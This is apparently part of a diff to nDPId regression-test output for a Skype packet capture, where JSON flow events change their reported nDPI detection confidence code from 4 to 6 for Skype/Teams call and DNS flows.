00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FOcAAEARGqjAqAEi1cezjzLdnFYAKftynEgChXSqdM1qvdY\/tcyUx+hTJaaUvSW+LNUHctwmtBhJ"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -498,13 +498,13 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rAwAAEAR7JDAqAEiQTffFTLdnFsAJTYGnEoCYEAkEhPrC3cXaZ2QhtIeOoxIY9w9Ekoojl8="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAAySgUAAEARsYLAqAEib91NjDLdnEMAHpNUnEwCeUQO24lPxsdSE1aywi7G9Ehfag=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3KwsAAEARbhfAqAEinTeCkjLdgQkAI6nfnE4CnxxG0E+kNYaCqSmEqqaVzyCf2xFtLT6I"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} 
@@ -513,16 +513,16 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPisQAAEARbGbAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPsQsAAEARRh\/AqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAABBH10AAEARELrAqAEinTfrkzLdnFQALfL6nFACIA2HAe7F64ULrxZmZzlp\/IcJjWPYQGVuGoQXNRtdAcprsg=="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SBkAAEARs0rAqAEib91NpTLdnFQAKf+JnFIC4bFrPlS3SgwUQ0ZkfJhi4Ibaq\/8x3HMPk6r8UbN8"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABP37sAAEARF2\/AqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 
@@ -531,50 +531,50 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 